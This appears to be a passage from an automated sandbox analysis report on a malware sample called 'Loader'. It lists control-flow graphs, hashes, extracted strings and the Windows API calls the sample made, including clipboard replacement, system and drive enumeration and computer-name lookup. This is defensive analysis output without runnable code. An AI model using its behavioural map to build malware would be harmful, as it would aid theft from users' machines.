                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                        • String ID: UvW$$%&'$&e?g$'y){$Rac$xY`[$|}
                                                                                        • API String ID: 505850577-3935235898
                                                                                        • Opcode ID: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                        • Instruction ID: 3c98ca3655e8fbad89b897cedc23f9ec929c21c5d575d6668501c9692a1c22de
                                                                                        • Opcode Fuzzy Hash: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                        • Instruction Fuzzy Hash: 4D32F072A083408BD314CF64C8817ABFBE2EBD9714F18592EF5949B390DB78D905CB96

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 585 41052c-410544 586 410546-410549 585->586 587 410573-4105a1 call 401880 586->587 588 41054b-410571 586->588 591 4105a3-4105a6 587->591 588->586 592 4105d5-4105f8 call 401880 591->592 593 4105a8-4105d3 591->593 596 4105fa-410636 call 413e30 592->596 597 4105fc-410600 592->597 593->591 604 410638 596->604 605 41063a-41067d call 407f70 call 40a510 596->605 599 410fc3 597->599 601 411ba0 599->601 603 411ba2-411ba5 call 401f40 601->603 611 40eae1-411bb6 603->611 612 40eae8-40eb12 call 401f50 603->612 604->605 618 410684-410687 605->618 619 40eb16-40eb19 612->619 620 4106b4-4106cd call 401880 618->620 621 410689-4106b2 618->621 623 40eb55-40eb7b call 401e40 619->623 624 40eb1b-40eb53 619->624 628 4106d3-41073b call 413e30 620->628 629 410777-4107d0 call 413e30 620->629 621->618 630 40eb7d-40eba0 623->630 631 40eb7f 623->631 624->619 638 41073d 628->638 639 41073f-410770 call 407f70 call 40a510 628->639 640 4107d2 629->640 641 4107d4-410872 call 407f70 call 40a510 RtlExpandEnvironmentStrings 629->641 637 40eba2-40eba5 630->637 631->603 643 40eba7-40ebf6 637->643 644 40ebf8-40ec4d call 401980 637->644 638->639 639->629 640->641 655 410876-410879 641->655 643->637 644->601 653 40ec53 644->653 653->601 656 410898-4108a1 655->656 657 41087b-410896 655->657 658 4108a3-4108b6 call 407f80 656->658 659 4108bb-4108d4 656->659 657->655 658->599 661 4108d6 659->661 662 4108d8-410933 call 407f70 RtlExpandEnvironmentStrings 659->662 661->662 667 410935-410959 call 407f80 * 2 662->667 668 41095e-410987 call 407f80 662->668 687 410fc1 667->687 677 410989-41098c 668->677 679 4109ca-4109ea call 401880 677->679 680 41098e-4109c8 677->680 685 4109ec 679->685 686 4109ee-410a0f call 413e30 679->686 680->677 688 410a45-410a64 685->688 692 410a11 686->692 693 410a13-410a43 call 407f70 call 40a510 686->693 687->599 691 410a66-410a69 688->691 694 410ab2-410afd call 401b90 691->694 695 410a6b-410ab0 691->695 692->693 693->688 700 410b01-410b04 694->700 695->691 702 410b06-410b39 700->702 703 410b3b-410b63 call 401a90 700->703 702->700 707 410b69-410ba5 call 414290 call 401f40 703->707 708 410e8c-410f1c call 408890 call 414ea0 call 409400 703->708 718 410ba7 707->718 719 410ba9-410bce call 407f70 707->719 720 410f21-410f26 708->720 718->719 725 410bd0-410bd7 719->725 726 410bfb-410bfd 719->726 722 410f65-410f97 call 407f80 * 2 720->722 723 410f28-410f37 720->723 761 410fa1-410fab 722->761 762 410f99-410f9c call 407f80 722->762 728 410f59-410f61 call 407f80 723->728 729 410f39-410f40 723->729 735 410bd9-410bf1 call 413f60 725->735 733 410bff-410c01 726->733 728->722 734 410f42-410f55 call 4140e0 729->734 738 410c03-410c0a 733->738 739 410c0f-410c4a call 401f50 733->739 748 410f57 734->748 749 410bf3 735->749 750 410bf5-410bf9 735->750 738->708 752 410c4c-410c4f 739->752 748->728 749->735 750->726 754 410c51-410c81 752->754 755 410c83-410cc3 call 401880 752->755 754->752 760 410cc5-410cc8 755->760 765 410ce7-410d2f call 401880 760->765 766 410cca-410ce5 760->766 763 410fb5-410fbc call 408970 761->763 764 410fad-410fb0 call 407f80 761->764 762->761 763->687 764->763 772 410d31-410d34 765->772 766->760 773 410d82-410dd4 call 401b90 772->773 774 410d36-410d80 772->774 777 410dd6-410dd9 773->777 774->772 778 410e16-410e87 call 401b90 call 413f80 777->778 779 410ddb-410e14 777->779 778->733 779->777
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1$<$A$G$U$[$b$f$p$x${
                                                                                        • API String ID: 0-2596809943
                                                                                        • Opcode ID: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                        • Instruction ID: 977eae197484217fe3de983ef0328e02866eaecbdb9648841de3f436da40142b
                                                                                        • Opcode Fuzzy Hash: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                        • Instruction Fuzzy Hash: 3052907160C7808BD324DB38C5953AFBBE1ABD5314F148A2EE4DAD73C1DA7889858B47

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00000001), ref: 031B1032
                                                                                        • OpenClipboard.USER32(00000000), ref: 031B103C
                                                                                        • GetClipboardData.USER32(0000000D), ref: 031B104C
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 031B105D
                                                                                        • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 031B1090
                                                                                        • GlobalLock.KERNEL32 ref: 031B10A0
                                                                                        • GlobalUnlock.KERNEL32 ref: 031B10C1
                                                                                        • EmptyClipboard.USER32 ref: 031B10CB
                                                                                        • SetClipboardData.USER32(0000000D), ref: 031B10D6
                                                                                        • GlobalFree.KERNEL32 ref: 031B10E3
                                                                                        • GlobalUnlock.KERNEL32(?), ref: 031B10ED
                                                                                        • CloseClipboard.USER32 ref: 031B10F3
                                                                                        • GetClipboardSequenceNumber.USER32 ref: 031B10F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409638386.00000000031B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409622522.00000000031B0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409653107.00000000031B2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_31b0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1416286485-0
                                                                                        • Opcode ID: 322be114c218627d5e9c3cdf243dfca7d8776827b06cac6c668bd45d1e8ab265
                                                                                        • Instruction ID: 51646543eef1b37d2ad58d474e3e4b160100742963696c94182be7260ad497ed
                                                                                        • Opcode Fuzzy Hash: 322be114c218627d5e9c3cdf243dfca7d8776827b06cac6c668bd45d1e8ab265
                                                                                        • Instruction Fuzzy Hash: 9E21B635604250ABD7287B72AC19BAAB7B8FF0C741F0A0838F945D6164F7318885C7B1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 811 4230d3-4230d6 812 4230e5-4230ee 811->812 813 4230dd 811->813 814 4230f0-4230f5 812->814 815 4230f7 812->815 813->812 816 4230fe-423139 call 407f70 814->816 815->816 819 423140-42316f 816->819 819->819 820 423171-423179 819->820 821 423191-42319d 820->821 822 42317b-42317e 820->822 824 4231c1-4231dd call 440dc0 821->824 825 42319f-4231a3 821->825 823 423180-42318f 822->823 823->821 823->823 829 4233a3 824->829 830 4234c0-423562 824->830 831 4231f4-4231fd 824->831 832 4231e4-4231eb 824->832 833 4233a9-42344b 824->833 826 4231b0-4231bf 825->826 826->824 826->826 829->833 835 423570-4235ad 830->835 836 423206 831->836 837 4231ff-423204 831->837 832->831 834 423450-42348c 833->834 834->834 838 42348e-4234b1 call 420e10 834->838 835->835 839 4235af-4235c3 call 420e10 835->839 840 42320d-4232b1 call 407f70 836->840 837->840 838->830 845 4235c8-4235cb 839->845 847 4232c0-4232ee 840->847 849 4235d3-4235eb 845->849 847->847 848 4232f0-4232f8 847->848 850 423321-423334 848->850 851 4232fa-423301 848->851 852 4235f0-423620 849->852 854 423351-423371 GetLogicalDrives call 440dc0 850->854 855 423336-42333a 850->855 853 423310-42331f 851->853 852->852 856 423622-4236aa 852->856 853->850 853->853 854->849 862 423720-423726 call 407f80 854->862 863 423711 854->863 864 423717-42371d call 407f80 854->864 865 423735-42373b call 407f80 854->865 866 42370b 854->866 867 423378-423392 854->867 868 423399 854->868 869 42373e-42374a 854->869 870 42372f 854->870 871 4236fc-423702 call 407f80 854->871 857 423340-42334f 855->857 859 4236b0-4236d1 856->859 857->854 857->857 859->859 861 4236d3-4236f2 call 420a30 859->861 861->871 862->870 863->864 864->862 865->869 866->863 867->849 867->862 867->863 867->864 867->865 867->866 867->868 867->869 867->870 867->871 868->829 870->865 871->866
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DJ$,@ F$,D J$57B$>\:B$IF$HN
                                                                                        • API String ID: 0-546559132
                                                                                        • Opcode ID: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                        • Instruction ID: 573b38de4df0c584551da9470d46ba7f63cc1349f9138d30f378e2aa21cb097c
                                                                                        • Opcode Fuzzy Hash: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                        • Instruction Fuzzy Hash: 88E1D9B560D3418FD310CF68E89126BBBE1FBC5754F14892DE9818B361E778890ACB4B

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1023 409400-40940e 1024 409853 1023->1024 1025 409414-40947b call 405e20 call 407f70 1023->1025 1027 409855-409861 1024->1027 1031 409480-4094bc 1025->1031 1031->1031 1032 4094be-4094de call 408d30 1031->1032 1035 4094e0-40950d 1032->1035 1035->1035 1036 40950f-409536 call 408d30 1035->1036 1039 409540-409581 1036->1039 1039->1039 1040 409583-4095b3 call 408d30 1039->1040 1043 4095c0-4095d4 1040->1043 1043->1043 1044 4095d6-4095e3 1043->1044 1045 4095f0-40961c 1044->1045 1045->1045 1046 40961e-40963b call 408d30 1045->1046 1049 409640-409688 1046->1049 1049->1049 1050 40968a-409758 call 409000 1049->1050 1053 409760-409774 1050->1053 1053->1053 1054 409776-40977e 1053->1054 1055 409780-409788 1054->1055 1056 4097a1-4097ac 1054->1056 1057 409790-40979f 1055->1057 1058 4097d1-4097ff 1056->1058 1059 4097ae-4097b1 1056->1059 1057->1056 1057->1057 1061 409800-409814 1058->1061 1060 4097c0-4097cf 1059->1060 1060->1058 1060->1060 1061->1061 1062 409816-40982b call 40bf90 1061->1062 1064 409830-409851 call 407f80 1062->1064 1064->1027
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9Z$E887D0B6A53AEE368246926E533C64D7$QB$f*Dk$hi$j*Dk
                                                                                        • API String ID: 0-861199822
                                                                                        • Opcode ID: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                        • Instruction ID: f303c378167b457a4bc42ceebe78ce79b7bb772c8b3d846b3dc4aa0fafa8ed13
                                                                                        • Opcode Fuzzy Hash: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                        • Instruction Fuzzy Hash: 85B1227161C3808BD718DF65C8516ABBBE2EBD2304F14892DE0E59B392D73CD50ACB5A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1067 42c98c-42c9aa 1068 42c9b0-42c9ea 1067->1068 1068->1068 1069 42c9ec-42c9f9 1068->1069 1070 42ca1b-42ca27 1069->1070 1071 42c9fb-42ca01 1069->1071 1073 42ca41-42ca8b call 43f730 1070->1073 1074 42ca29-42ca2b 1070->1074 1072 42ca10-42ca19 1071->1072 1072->1070 1072->1072 1080 42ca90-42cad1 1073->1080 1076 42ca30-42ca3d 1074->1076 1076->1076 1078 42ca3f 1076->1078 1078->1073 1080->1080 1081 42cad3-42cb12 call 41d350 1080->1081 1084 42cb20-42cb4c 1081->1084 1084->1084 1085 42cb4e-42cb55 1084->1085 1086 42cb57-42cb5b 1085->1086 1087 42cb6b-42cb73 1085->1087 1088 42cb60-42cb69 1086->1088 1089 42cb75-42cb76 1087->1089 1090 42cb8b-42cb95 1087->1090 1088->1087 1088->1088 1093 42cb80-42cb89 1089->1093 1091 42cb97-42cb9b 1090->1091 1092 42cbab-42cbeb 1090->1092 1094 42cba0-42cba9 1091->1094 1095 42cbf0-42cc04 1092->1095 1093->1090 1093->1093 1094->1092 1094->1094 1095->1095 1096 42cc06-42cc0d 1095->1096 1097 42cc2b-42cc35 1096->1097 1098 42cc0f-42cc13 1096->1098 1100 42cc37-42cc3b 1097->1100 1101 42cc4b-42ccf2 1097->1101 1099 42cc20-42cc29 1098->1099 1099->1097 1099->1099 1102 42cc40-42cc49 1100->1102 1103 42cd00-42cd3a 1101->1103 1102->1101 1102->1102 1103->1103 1104 42cd3c-42cd49 1103->1104 1105 42cd5b-42cd67 1104->1105 1106 42cd4b-42cd4f 1104->1106 1107 42cd81-42cdd3 call 43f730 GetPhysicallyInstalledSystemMemory 1105->1107 1108 42cd69-42cd6b 1105->1108 1109 42cd50-42cd59 1106->1109 1114 42cde0-42ce22 1107->1114 1110 42cd70-42cd7d 1108->1110 1109->1105 1109->1109 1110->1110 1112 42cd7f 1110->1112 1112->1107 1114->1114 1115 42ce24-42ce5b call 41d350 1114->1115 1118 42ce60-42ce8c 1115->1118 1118->1118 1119 42ce8e-42ce95 1118->1119 1120 42ce97-42ce9b 1119->1120 1121 42ceab-42ceb3 1119->1121 1124 42cea0-42cea9 1120->1124 1122 42ceb5-42ceb6 1121->1122 1123 42cecb-42ced5 1121->1123 1125 42cec0-42cec9 1122->1125 1126 42ced7-42cedb 1123->1126 1127 42ceeb-42cf2b 1123->1127 1124->1121 1124->1124 1125->1123 1125->1125 1128 42cee0-42cee9 1126->1128 1129 42cf30-42cf44 1127->1129 1128->1127 1128->1128 1129->1129 1130 42cf46-42cf55 1129->1130 1131 42cf57 1130->1131 1132 42cf6b-42cf75 1130->1132 1133 42cf60-42cf69 1131->1133 1134 42cf77 1132->1134 1135 42cf8b-42d015 1132->1135 1133->1132 1133->1133 1136 42cf80-42cf89 1134->1136 1136->1135 1136->1136
                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CDAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: @[/S$YcZ`$b
                                                                                        • API String ID: 3960555810-168354034
                                                                                        • Opcode ID: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                        • Instruction ID: b2947f96fe340a9df3130b14c84d258fde6853037fb12cce7bd63350d2db69b3
                                                                                        • Opcode Fuzzy Hash: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                        • Instruction Fuzzy Hash: 39F1247060C3D18BD729CF29A4A036FFFE1AF96304F18496EE0DA87392D77985058B56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                        • Instruction ID: b8f4197d2f7c9f56fe9597a4586bb863907c9934a7ce81ce2e300af997d9591d
                                                                                        • Opcode Fuzzy Hash: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                        • Instruction Fuzzy Hash: 398117B190C2018FC714DF28C8916ABB7F1AF95304F18492EE4D987392E738E945CB9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: TUVW
                                                                                        • API String ID: 2994545307-380802359
                                                                                        • Opcode ID: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                        • Instruction ID: 7047d3b5c699d964b661b5aab337125677ab7b56ce49f2f3292149c0b4397d23
                                                                                        • Opcode Fuzzy Hash: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                        • Instruction Fuzzy Hash: 659165717083019FE325DF68D880A2BB7E2EBD6310F18893DE69597391C639DC16CB96
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                        Strings
                                                                                        • E887D0B6A53AEE368246926E533C64D7, xrefs: 0040D240
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: E887D0B6A53AEE368246926E533C64D7
                                                                                        • API String ID: 0-1823824728
                                                                                        • Opcode ID: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                        • Instruction ID: b8d103c4c60b49fbe0ba22ba74ead3f046f8f308e92d5c9b0b08579b41597fc8
                                                                                        • Opcode Fuzzy Hash: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                        • Instruction Fuzzy Hash: 8C51BC72B407004BDB184F79CC52377B6A3AFE6321F1D967DD0969B7D6E63898028308
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                        • Instruction ID: c62614d48869f4b7cb033b57bff67ce6e552f370dc62dc9228bf6d030800f41c
                                                                                        • Opcode Fuzzy Hash: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                        • Instruction Fuzzy Hash: 28412435B083514BD328CA3C9C6137BBBE2DBD6311F688A6DE5D1C7799E639C8018709
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                        • Instruction ID: dc484de900702ea7fd58ce72979cff842d7c41974bd76ae8d50f3999e681b5d9
                                                                                        • Opcode Fuzzy Hash: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                        • Instruction Fuzzy Hash: AA01DE75A80B108BD7298F24DD6136A77E0EB07304F14806EC592A7780DA7AFD008F99

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 806 4336a0-433739 GetSystemMetrics * 2 810 433740-433af5 806->810
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID: AC$*?C$1$LGC$uDC$zBC$=C
                                                                                        • API String ID: 4116985748-682157884
                                                                                        • Opcode ID: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                        • Instruction ID: 1998a03cc5df2a2f33f1525dd043022f22112b898c887f3cf15ef20427d46a93
                                                                                        • Opcode Fuzzy Hash: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                        • Instruction Fuzzy Hash: 979149B011A384CBE774EF11C5597CFBAE1AB82308F11891ED29D4B250DBBA450DDF9A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1137 4085b0-4085be call 43d1f0 1140 4085c4-4085cb call 435f90 1137->1140 1141 4086d9-4086db ExitProcess 1137->1141 1144 4085d1-4085fa GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 1140->1144 1145 4086c2-4086c9 1140->1145 1146 408600-40862e 1144->1146 1147 4086d4 call 43d970 1145->1147 1148 4086cb-4086d1 call 407f80 1145->1148 1146->1146 1150 408630-40865b call 43bd20 1146->1150 1147->1141 1148->1147 1155 408660-40867c 1150->1155 1156 408696-4086b6 GetForegroundWindow call 4098b0 1155->1156 1157 40867e-408694 1155->1157 1156->1145 1160 4086b8 call 40cab0 1156->1160 1157->1155 1162 4086bd call 40b550 1160->1162 1162->1145
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004085D1
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004085D7
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085E8
                                                                                        • GetForegroundWindow.USER32 ref: 0040869C
                                                                                        • ExitProcess.KERNEL32 ref: 004086DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4063528623-0
                                                                                        • Opcode ID: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                        • Instruction ID: 509b8593f85bca22239e70e965a689bc814e36a94043752a13a9102ecda549f4
                                                                                        • Opcode Fuzzy Hash: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                        • Instruction Fuzzy Hash: BF2168B1E002005BD7147F319D0A72A76959F86705F0A863EECD5BB3E7EE3D8811865E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1164 42bdf4-42be02 1165 42be04-42be0b 1164->1165 1166 42be1b-42be64 call 43f730 1164->1166 1167 42be10-42be19 1165->1167 1172 42be70-42be8a 1166->1172 1167->1166 1167->1167 1172->1172 1173 42be8c-42be96 1172->1173 1174 42beab-42bf2d GetComputerNameExA 1173->1174 1175 42be98-42be9f 1173->1175 1177 42bf2e 1174->1177 1176 42bea0-42bea9 1175->1176 1176->1174 1176->1176 1177->1177
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: #v
                                                                                        • API String ID: 2904949787-554117064
                                                                                        • Opcode ID: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                        • Instruction ID: 4b0124f1363a5f6538044442258c4939d1b124f166065c956affb4ec42b5f0b7
                                                                                        • Opcode Fuzzy Hash: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                        • Instruction Fuzzy Hash: 7731F53522C3918FD7218B35D8107EBBBE5AF9A314F99486EC1C8D7252DB788806C791

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1178 42bdee-42be64 call 43f730 1183 42be70-42be8a 1178->1183 1183->1183 1184 42be8c-42be96 1183->1184 1185 42beab-42bf2d GetComputerNameExA 1184->1185 1186 42be98-42be9f 1184->1186 1188 42bf2e 1185->1188 1187 42bea0-42bea9 1186->1187 1187->1185 1187->1187 1188->1188
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
